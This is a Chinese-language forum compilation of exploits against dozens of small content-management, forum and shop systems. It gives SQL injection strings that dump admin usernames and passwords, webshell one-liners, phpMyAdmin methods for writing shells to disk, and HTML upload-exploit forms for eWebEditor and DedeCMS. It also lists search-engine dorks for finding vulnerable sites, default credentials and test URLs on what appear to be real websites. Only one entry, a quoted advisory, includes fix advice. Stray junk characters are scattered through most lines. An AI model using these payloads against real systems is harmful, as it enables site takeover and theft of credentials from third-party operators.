启航企业建站系统 cookie注入漏洞通杀所有版本
% R# O2 `. X4 a1 t+ p, {9 ^' j+ L, b; P: |; A0 p5 n
直接上exploit:
* a0 {& W: \1 L7 c) fjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));. B0 I6 \; A1 k/ {
test:http://www.tb11.net/system/xitong/shownews.asp?id=210# j9 V; @% Q) W$ p, w9 }- u8 g
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& a7 }$ A# t) R- ] l0 ~2 D1 ~Asprain论坛 注册用户 上传图片就可拿到webshell
$ W* K: r" j/ A( Y2 ?$ i1 Y( l" y, f5 C: _- ]0 {
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
. z& [3 _- a+ G, Q5 k# t8 C1.txt存放你的一句话马 如:<%execute(request("cmd"))%>; @7 b4 i, x6 k% y; [% P2 h
2.gif 为一小图片文件,一定要小,比如qq表情图片
8 p# d; \/ W, V: B3 }3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用/ a$ b0 r) \, j0 Z5 ]0 |
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了6 ~2 l4 W1 n* J: t, H
5.q.asp;.gif) `/ ^% [! `1 e' ]8 [
google:Powered by Asprain
! u4 z2 C i/ n" x' |9 U--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: b+ e( B0 M( ?5 X/ e( d
3 p( l: t/ U6 M b5 `ShopNum1全部系统存在上传漏洞。3 _5 f2 Q5 |4 f5 X" O/ D* C
2 z0 ?" b$ f6 Q" V U
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
7 d6 h6 w% V6 K. l按说明 提示登录后台。。
* x6 p! v0 _, J在后台功能页面->附件管理->附件列表$ A) O+ C4 ?3 B
可以直接上传.aspx 后缀木马
) t& }" d+ }0 s6 }http://demo.shopnum1.com/upload/20110720083822500.aspx* F4 X$ d* t6 g, F
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' {% W5 J" D5 X. w7 i7 A4 H+ o0 E- v, `- y" H l
牛牛CMS中小企业网站管理系统 上传漏洞: P, _# _# H" E' x/ s/ g0 \& Q
2 }. w1 ?5 ` y/ e5 t牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
# M! T9 r0 D) f: R2 @; A后台:admin/login.asp
W) L8 ~7 @7 N gewebeditor 5.5 Nday
% ~9 Z$ G) C/ d2 E; k3 e$ y2 a3 Dexp:( L6 c' Q; ?" ]$ I2 N9 }9 X
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
. ]4 Q2 O' Y& t( _% @% \, n<input?type=file?name=uploadfile?size=100><br><br>?! K- j$ n3 D1 h! X/ z/ ]6 m# K. n
<input?type=submit?value=upload>?
+ @& ^. q/ _. w: G</form>
y7 [/ |7 {) u Q9 v3 d, f& _ps:先上传小马.
! t: I7 Q: \' ]% V Ninurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏- q& q8 j8 Q* E1 I* A ?2 R
/ o1 R! A5 q3 ?7 e--------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 J1 P+ ?! j- s, X) K! K
9 t9 u2 T2 T! D/ l( ?# T
YothCMS 遍历目录漏洞
: ~ j6 A9 [+ O- q0 A% ^* T3 p0 Z
7 l1 s2 w1 N# ?6 ?- P/ g+ @; V优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
5 l; o- A+ X$ Q3 i默认后台:admin/login.asp
% t) Z3 I2 U& ^) s遍历目录:
0 M8 y0 r% ~8 ?1 T$ l3 wewebeditor/manage/upload.asp?id=1&dir=../5 k3 p1 J! a: m4 ]6 U1 I
data:6 x q; Z2 ~& m4 b1 n1 C
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
2 {; m; t# p4 J& ]. C$ s$ ~--------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ `' X, s5 N5 y$ y' G- Q
# i. {" w& f7 H8 wNet112企业建站系统 1.0
. R; m$ Y) P+ H) h
/ v3 J) I- k# W% @" q源码简介:5 n; m3 }" p, ~" |
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
2 t: d7 l! O. Y添加管理员:! |3 O( j( Z) I$ W3 p! _
http://www.0855.tv/admin/admin.asp?action=add&level=2
% E7 w, u: @' w F9 F4 t, o& e6 h其实加不加都不是很重要,后台文件都没怎么作验证。
! J4 w# o& T# u: ^$ }5 S# Z上传路径:
( x3 h$ L4 |0 M5 C1 Lhttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
! y. D: i+ o1 q9 T; q( Y) q6 ~- Hhttp://www.0855.tv/inc/Upfile.asp?Stype=27 E! p7 m: H* L" u* h$ J$ _0 ]9 Z
怎么利用自己研究。
/ ]8 j' d, b* g9 g/ `6 n遍历目录:# X* }6 W3 K1 u, J
http://www.0855.tv/admin/upfile.asp?path=../..1 n; V- t: K" Z! {& a* s
如:) I! C) ]: ~& f1 O5 n
http://www.0855.tv/admin/upfile.asp?path=../admin4 }) X( r' l ^9 p$ n0 T. [4 u
http://www.0855.tv/admin/upfile.asp?path=../data
" T" N+ m# h+ W6 b# K6 D--------------------------------------------------------------------------------------------------------------------------------------------------------------------------( X& V% `% Z6 Z
9 a! N0 x0 u- l! o% R" t
易和阳光购物商城通杀 上传漏洞
+ i2 X* }1 V1 V& x5 A* a7 e' v' x3 p; n/ X" A
前提要求是IIS6.0+asp坏境。) N2 ^1 D0 G( n) X% m1 s; R
漏洞文件Iheeo_upfile.asp
% x/ `( A" `# y, _过滤不严.直接可以iis6.0上传9 q9 }) I$ a7 A) K" k- O' e( x; f
把ASP木马改成0855.asp;1.gif
1 t; M' E* W! x. a$ f: y& m# R直接放到明小子上传
( \5 G0 @; K4 HGoogle搜索:inurl:product.asp?Iheeoid=
( U% h6 ^) D9 ^$ J--------------------------------------------------------------------------------------------------------------------------------------------------------------------------, ], J8 s& L4 x
+ D4 y3 A6 w+ @
phpmyadmin后台4种拿shell方法
1 M: Y6 h2 L D- e5 d' ]' c0 T7 |1 i4 }6 n
方法一:
" @, o1 n6 p c7 i/ q8 ~! }CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );% J2 U/ r& S$ V( Z) g' E# R
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
$ i+ c) J l& c8 T+ iSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
7 N7 A6 e, R9 s# C+ c& T4 o+ o8 |----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
9 x% q/ o: @( C Z7 q5 w9 h3 K一句话连接密码:xiaoma
8 I/ ]8 Q2 z6 X% W3 U方法二:3 ~. s) _' M: v I2 f
Create TABLE xiaoma (xiaoma1 text NOT NULL);& r/ }" s0 t: O6 ]
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');7 _$ A: K4 h2 [2 t) [3 r, v
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';3 G0 ^ P/ ^. e/ |
Drop TABLE IF EXISTS xiaoma;
! _+ T5 o# C$ w! o- p9 R方法三:
4 ^3 p9 C+ o6 n读取文件内容: select load_file('E:/xamp/www/s.php');
2 g: e7 d- E7 x) r- F写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'+ g5 J8 I, Z% h% V7 _
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
. d' y* p* P: f. b方法四:
# K) V! w6 V' r. ]6 Z+ j0 G |select load_file('E:/xamp/www/xiaoma.php');7 a K. A' l( E- @
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php' E. T& X. ~- r7 M& o9 V; Y
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir* d& z! [1 ]" j$ O5 W* E7 n
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 b+ `; y. D( i& ?; v
8 Q P2 u6 n" K( t传信网络独立开发网站源码0day漏洞, Z; X$ _: ?/ D( `' `6 i5 A
* ]+ G* e! i o1 Q" H! Q: G
后台system/login.asp4 H$ O( A F% h
进了后台有个ewebeditor. P; L; N; ?0 O; |3 U
Google 搜索inurl:product1.asp?tyc=. o8 i5 `7 P! s& J/ K
编辑器漏洞默认后台ubbcode/admin_login.asp
, M0 ]! U, n' y$ t6 S. C) z7 C数据库ubbcode/db/ewebeditor.mdb6 l' |! K) y% [, R5 N0 z) V
默认账号密码yzm 1111113 z8 t5 Z4 K) \4 t# M5 j v
3 A( P% I8 Q. o+ }0 o) z拿webshell方法: L' J W$ I+ O6 L
登陆后台点击“样式管理”-选择新增样式 ; o3 f. O4 ^3 r$ b/ ?$ ]
样式名称:scriptkiddies 随便写
6 `2 q( ]- \- p6 T) o) y$ V路径模式:选择绝对路径 ! H1 G; |. A; I" W
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
5 J3 `7 I$ r* F4 a图片类型比如就是我们要上传的ASP木马格式
1 K W9 X+ I% O0 Q- p上传路径:/
1 i7 d. R2 _. g% u$ [图片限制:写上1000 免的上不了我们的asp木马
! a6 d2 K3 e( _' Y5 f" u6 o上传内容不要写
' S/ ^3 M. d0 X8 V可以提交了
$ J6 ?6 m3 N3 ]" ~1 Y, v& d/ g0 L7 C样式增加成功!
9 {; E( g+ K- f% j( ~返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
* z3 a6 E6 _/ G3 y按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置+ s+ k4 `* N) C$ m
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
6 Y2 ], ?/ p* u( U上ASP木马 回车 等到路径# r% q& y1 S& B3 n, H8 v
9 _( [, ^9 C4 v后台:system/login.asp3 T) Y9 j" Q% m9 H2 y
Exp:
% U1 {& e: b4 |. Vand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master- O4 O5 ], w0 z4 M
测试:
2 A2 N9 n' r7 m+ v& Z6 ghttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master8 \* z- o$ ]+ i8 S
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
5 @! A, {4 a: ?7 F7 Z" c2 H--------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ b; {' ?; ?4 z; R$ h8 S. q
9 C/ b5 d. z F4 U; V6 bfoosun 0day 最新注入漏洞$ l2 T7 V6 ^, e6 q) F# T4 |% G
- o* ^ U, T& a
漏洞文件:www.xxx.com/user/SetNextOptions.asp9 o$ a& V% s' \" h
利用简单的方法:
0 W# L, Y5 d& |9 P I暴管理员帐号:
9 @/ |; b9 O6 g' @8 ]8 _http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin C) n/ |+ Y2 ^& b
暴管理员密码:- d- Q- ~- z: k, B4 r4 ?
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,( d( v2 P$ W7 J8 k
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: a7 K: m1 _4 p' k9 [/ `
/ p) ? b5 N/ j, @9 a网站程序的版权未知!
: [$ ]% T# H! W/ ~4 ~
1 {! C2 {6 s2 g0 g- x& D默认网站数据库:6 ^% c% F* R; M# P
www.i0day.com/data/nxnews.mdb, x6 L% d% \) r, u
ewebeditor 在线编辑器:2 b* \- }4 \- c5 j- J0 O
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
% p+ T m- f3 z登录地址:ewebeditor/admin_login.asp
0 {6 `% F7 h7 J9 k2 _3 h默认密码:admin admin* I1 \4 F q9 I" E
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
+ T/ u' N" {2 S" @' X% ], D
7 W( F0 U4 E. }' n8 iSql注入漏洞:9 j0 x6 k1 J. n
http://www.i0day.com/detail.asp?id=12& D G- T. @7 S3 J8 k
exp:% Z* \; D" N9 G
union select 1,admin,password,4,5,6,7,8 from admin4 h4 L/ D9 v& K' a% a n
爆出明文帐号/密码8 e+ X s% s8 l
9 t' f% ~% h1 f! o7 n+ r
上传漏洞:8 `+ Z: O; }, r/ c' A" a C
后台+upfile.asp
& _. W% V3 w& e* o+ p ^如:* f5 v! i7 i4 I# }7 C4 Z: X1 p
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
8 r5 Z" B( W- h8 cshell的地址:网址+后台+成功上传的马
0 ] p$ y. {: m$ Cgoogle:inurl:news.asp?lanmuName=
\8 n+ g4 l- p( A9 D# q$ S------------------------------------------------------------------------------------------------------------------------------------------------------------------------' j/ o! {. A( j& N
/ h$ q7 \3 m2 R" \dedecms最新0day利用不进后台直接拿WEBSHELL
$ D( t4 J' C z
' ?. e6 L3 U4 {; X拿webshell的方法如下:
4 Z- ]3 a& N1 B5 Q4 x网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.6 m# M x0 I5 `4 u
前题条件,必须准备好自己的dede数据库,然后插入数据:
% u+ E# Z( G1 }) q* T0 R: }insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); ; x* n4 f4 ~( r; ?( }0 b
; T6 x( s. s" e
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。+ Y* ^" g2 o3 g- G
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
% U; U" A: o7 U, T<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
* Q3 S% h+ T$ Z0 i6 l% k6 S<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
# F' y" N3 g& H<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />2 c/ H5 e# J! w1 t
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
2 [/ f P3 P8 i7 z( \' }# c: y$ F<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
+ Q5 S" C! U% N3 q/ O4 k) m7 l<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />. ]! ~/ u& c8 T! m
<input type="text" value="true" name="nocache" style="width:400">% C+ x# H2 x0 K9 {* A" \% g
<input type="submit" value="提交" name="QuickSearchBtn"><br />) K8 C" C& M% i* i6 `
</form>
! u, Z b6 f' Q( Z7 R1 m r4 o2 l5 D<script>6 p- l1 o3 b" ^; a+ S
function addaction()
* D0 _; e) W2 K& O8 c{7 y: ]7 A, Q% r# ?2 G3 t
document.QuickSearch.action=document.QuickSearch.doaction.value;0 O% K! R* {2 g
}1 P' s/ C- q0 S i
</script>% ^6 P' I( Q2 \& A( i
-----------------------------------------------------------------------------------------------------------------------------------------------
; y$ {) v: }7 ]; M: B/ t c6 B
' C, l n. `9 |+ e9 G, e: }dedecms织梦暴最新严重0day漏洞
! X$ e% Q9 w! K" \- C( F, G4 }) t0 [4 xbug被利用步骤如下:
% s& ^( g- x' Khttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root& U# x! d6 V. z; |. B
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
3 [8 E7 t- n! X) R7 A' |6 j C' N-------------------------------------------------------------------------------------------------------------------------------------------! x" J* y$ o$ U
9 y6 S" }; K- i. {( Y$ ?多多淘宝客程序上传漏洞 0 z/ k/ f. J( r$ f' ^- d8 R
漏洞页面:
& ^# C0 Q1 W ^2 h- Vadmin\upload_pic.php, K6 n1 } t% @! x4 c
传送门:, x; Q) f$ [2 q
http://www.www.com/admin/upload_pic.php?uploadtext=slide1) W9 Y4 L" b* F* [- f" O
PS:copy张图片马 直接 xxx.php 上传抓包地址!2 H6 r4 x! I7 n7 `
------------------------------------------------------------------------------------------------------------------------------------------------------
' \4 \2 N! M- \$ [) w
5 S/ c+ A( h J8 a4 a无忧公司系统ASP专业版后台上传漏洞
. r- T V' m* D) ~: R漏洞文件 后台上传" _. V' p8 B) L' S- E' f1 R- n
admin/uploadPic.asp+ P6 ^6 M- T# u# |7 M, k
漏洞利用 这个漏洞好像是雷池的. @* ^" r. M* ^; @5 ?1 W. Y
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
% f t" M6 B: j, L: D; @等到的webshell路径:
( ^9 Q/ X& I/ U S: Q/UploadFiles/scriptkiddies.asp;_2.gif- u$ F, g% q1 W: i$ c
---------------------------------------------------------------------------------------------------------------------------------------------------
- v0 }& M; ]4 X1 Y2 |
3 ?& y7 z' t/ O% I4 Y住哪酒店分销联盟系统2010
0 l7 F* D/ I. d! f$ r6 GSearch:! w/ W1 y) ~+ d1 X& g4 _+ C
inurl:index.php?m=hotelinfo
) X9 c# P( s7 S0 R% m& {+ Mhttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
6 t& U- ]+ i+ Q0 A6 d/ X9 m2 e) T默认后台:index.php?m=admin/login4 h8 c# g( x% w/ _
--------------------------------------------------------------------------------------------------------------------------------------------------) d2 d& j; X$ d8 w B
! e# ], C0 c6 O8 k N- ^& }/ g
inurl:info_Print.asp?ArticleID=$ k1 ]+ u4 M5 V' |6 V! z S0 j( k0 @
后台 ad_login.asp
$ r+ p3 T+ J1 F3 s L爆管理员密码:
, W o+ C, M; D2 [/ R: tunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin. n+ s; R) U+ I+ V/ T" t0 H/ v8 W
------------------------------------------------------------------------------------------------------------------------------------------------------------; @6 d) V. O% z& D
, Z; ]7 N' S+ M+ P
搜索框漏洞!
+ P/ c0 R% Q& S' N; r/ R2 l, T' x2 Y/ i%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='5 @( b1 f' I9 ?6 P
--------------------------------------------------------------------------------------------------------------------------------------------------------
2 I. q* ^& q' @4 [
4 U" T* M5 l8 W4 a$ p8 f! C# R关键字:
, C/ y8 l0 g4 G8 V1 M8 |# rinurl:/reg_TemletSel.asp?step=24 z- W) _9 B; F1 C& {
或者
8 B, s: w+ r: L6 g电子商务自助建站--您理想的助手7 `- L. c4 k9 ^) r
-------------------------------------------------------------------------------------------------------------------------------------------------
; o3 B0 ^& b- S% Z. l3 @9 F
+ \" A, z/ A6 \* `iGiveTest 2.1.0注入漏洞
3 k3 y1 X2 }( s4 X" IVersion: <= 2.1.0
1 \- \/ ]$ V, {0 C# Homepage: http://iGiveTest.com/3 X4 g: O0 O' a9 {7 J# E
谷歌关键字: “Powered by iGiveTest”
/ \4 }* j, o0 T7 J+ a1 c1 I3 K随便注册一个帐号。然后暴管理员帐号和密码& X8 E2 @6 X; C- p* Z: W( ~2 H
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
. c+ H, b8 ]! p, }------------------------------------------------------------------------------------------------------------------------------------------------( f; M* Q" P" B5 u
' v m5 u8 K+ c! U
CKXP网上书店注入漏洞
9 f% O! ^- ~" g) c0 E" X; b工具加表:shop_admin 加字段:admin, g! r, X' d. i: C; _
后台:admin/login.asp # r1 O: [$ N1 I. Y. Z8 C W( r
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/0 \' b$ f+ K+ k$ r R# Z. S) W
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
. p# E8 T0 D1 H# ^9 a0 \) D--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 Q6 {1 E- j2 v! E
. l" G0 M/ N( Y. X" ?段富超个人网站系统留言本写马漏洞9 B& Y2 Y |- M7 H
源码下载:http://www.mycodes.net/24/2149.htm2 w9 q3 a- _, ^2 J' h
addgbook.asp 提交一句话。
. G9 W* m7 M+ k4 i# n' n连接: http://www.xxxx.tv/date/date3f.asp9 Y9 Y& E" A/ ]" }/ a% _3 K z
google:为防批量,特略!
8 L" F7 f7 t9 ?( E- t3 X$ [-------------------------------------------------------------------------------------------------------------------------------------------------------------------------' i% Y' O& P! v; E' c
) r' x% V+ W6 w
智有道专业旅游系统v1.0 注入及列目录漏洞 C, K1 ]# D+ ^
默认后台路径:/admin/login.asp
0 {$ T1 x5 v* b6 h3 A# ]- D g默认管理员:admin
+ O' k5 F. R: G; x默认密码:123456
3 E/ b2 w# w. [5 G2 x! s" iSQL EXP Tset:
: E& ^( L. b, j) w; F0 ^9 ^7 chttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin6 A" ~: |( _3 x# L! f" Y& \8 w5 `8 g
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# k1 m, y8 E9 U+ S& r1 y7 x
+ C! O9 Y. H, r, Newebeditor(PHP) Ver 3.8 本任意文件上传0day/ v4 o P9 q: a
EXP:
4 A0 j7 d) d2 Y. h9 h1 A<title>eWebeditoR3.8 for php任意文件上EXP</title>% b! H/ ^; Y! ?
<form action="" method=post enctype="multip" b" I; E5 ~8 C4 c, C3 F
art/form-data">
3 m8 v+ x# j; }' D' [6 O<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> 0 X2 e& m6 y8 W# y
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
: V$ B3 i% g+ \( Y. B<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
$ L" F: q N9 U( X0 N$ Mfile:<input type=file name="uploadfile"><br>
: T% } ]- E6 @) ~& v% L5 A! p<input type=button value=submit onclick=fsubmit()> 9 i4 Q) A0 X8 I7 m% d( k8 G
</form><br>
$ Y5 l6 g4 d$ p" \* c<script>
& R% |- x+ q i5 Kfunction fsubmit(){
9 p1 ?. C& \. L* m/ P' kform = document.forms[0]; . {6 m- a1 d6 \& g$ e( B9 a- D7 @! E# j
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
4 R8 ^' k2 ~+ a. |alert(form.action); % V& e3 i% m* _6 D4 B. |2 j q
form.submit();
5 k/ g- A5 w. \, N7 X: l" Q; Z} % E( ^) n! x$ F% d5 L# R2 N
</script>8 a1 Y& ]' N' G5 P7 A
注意修改里面ewebeditor的名称还有路径。
: O) |# d1 ~$ f---------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 R* d% B, Q' ?" [4 F7 C
, O1 q, R" n/ F3 e V$ q; P1 k) x% J
提交’时提示ip被记录 防注入系统的利用8 u9 ]. L- y8 J% l: @# o
网址:http://www.xxx.com/newslist.asp?id=122′/ D7 ]; m5 M- ~! x
提示“你的操作已被记录!”等信息。
3 q N5 H3 O% _ T* P利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。1 E2 v7 N d+ U7 U3 G
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------, V- _0 @9 O$ H4 \0 M
1 E2 \# J: j$ g! O# J西部商务网站管理系统 批量拿shell-0day
f |, ]$ ^2 f% g9 g% U这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb ! f5 E* i# d* ^* B0 T( B
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
4 J7 V% B" k. r. S6 |; X2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合- e3 I+ J3 |5 ^- l, d! A
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
# e/ @& j" v( F3 e- f! H: L1 m6 L---------------------------------------------------------------------------------------------------------------------------------------------------------------------------, t: V- Z) @" V; M- y/ b
3 G. R0 T7 I0 c6 n
JspRun!6.0 论坛管理后台注入漏洞2 j+ P) @) ~. b6 s4 r* {. ^7 e8 q0 B
/ X z) v; u* C
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
" X! N1 T4 l( `& i, U! Z* K* ~3 ~JspRun!6.0 # z }- T9 |6 x! N5 }
漏洞描述:
, K! p, l+ U2 I$ {2 j8 GJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。; }1 Q, V2 f/ o; f, M
在处理后台提交的文件中ForumManageAction.java第1940行
1 Q* H7 p, A# D- I2 k! q4 j* uString export = request.getParameter("export");//直接获取,没有安全过滤 _- e1 a) a$ V9 g: `0 `: j
if(export!=null){
9 f7 P8 e0 S" \( F0 V U* C) [. gList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...7 D1 c6 o! e2 j2 H, L/ Z9 K
if(styles==null||styles.size()==0){/ i4 q, a" n7 C/ d) S1 c
<*参考2 c) E! U& E6 W2 J: _; n+ i
nuanfan@gmail.com% i5 q* b% t) @, o, N! g
*> SEBUG安全建议:+ T$ k& k. m- I: ]) x
www.jsprun.net; f; @1 m w4 X% `3 h" y o! h
(1)安全过滤变量export' R9 L/ c" P# W
(2)在查询语句中使用占位符( K" N4 X2 V1 _: x" v0 B2 j$ U
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* y6 e" x! Q4 @# L& l; V% F% Q' I+ R, {# {8 k
乌邦图企业网站系统 cookies 注入
% N3 }* G- g" P% B) X! {4 B/ N1 n3 L9 p6 {8 I4 S. e
程序完整登陆后台:/admin/login.asp
( Z" G. r$ A! W: V" Q3 m! X. a默认登陆帐号:admin 密码:admin888
/ ^# ^# F( i! B语句:(前面加个空格)
; E2 h2 ^% X# @4 m# u; G5 D$ |6 `# Yand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
9 O: u2 H( F! v4 Q" B- E3 y或者是16个字段:( ^8 N( k% A8 l6 m. r$ k& S
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
& ]! I6 @+ M x/ q0 K; H2 Y0 j0 d爆不出来自己猜字段。( H) C h( \, `5 Q7 E6 Y" q: S7 v
注入点:http://www.untnt.com/shownews.asp?=88$ k) T. e- z- T& C" W1 Q
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
3 M' b- y y, S( z关键字:
. S* _* r! w6 I) v4 m- Oinurl:shownews?asp.id=1 k% O8 K* R! ]$ I: [# p0 k5 f- B. D
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( l) w% M1 p4 R" ~ J4 ^/ C# s% U0 H+ K
CKXP网上书店注入漏洞( N8 s" p' _) x4 w& i
, ^7 F8 U( {, [4 {. Z工具加表:shop_admin 加字段:admin
, E3 ]% O( X5 M后台:admin/login.asp
; j. D7 G; u# m. l/ X8 K登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/7 j! A* a F3 c
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
8 ]- }2 B$ ]$ R5 N @---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 M* [* Y' Z5 f, V2 D; b4 x1 F" ]3 T; J; @& f
YxShop易想购物商城4.7.1版本任意文件上传漏洞5 U2 M7 Q# |( V/ |# B1 T
( }2 |" |- F6 L; m7 T. Mhttp://xxoo.com/controls/fckedit ... aspx/connector.aspx
+ |1 F z. F: F. |6 U5 R! A跳转到网站根目录上传任意文件。$ m" G; R9 ~" U
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
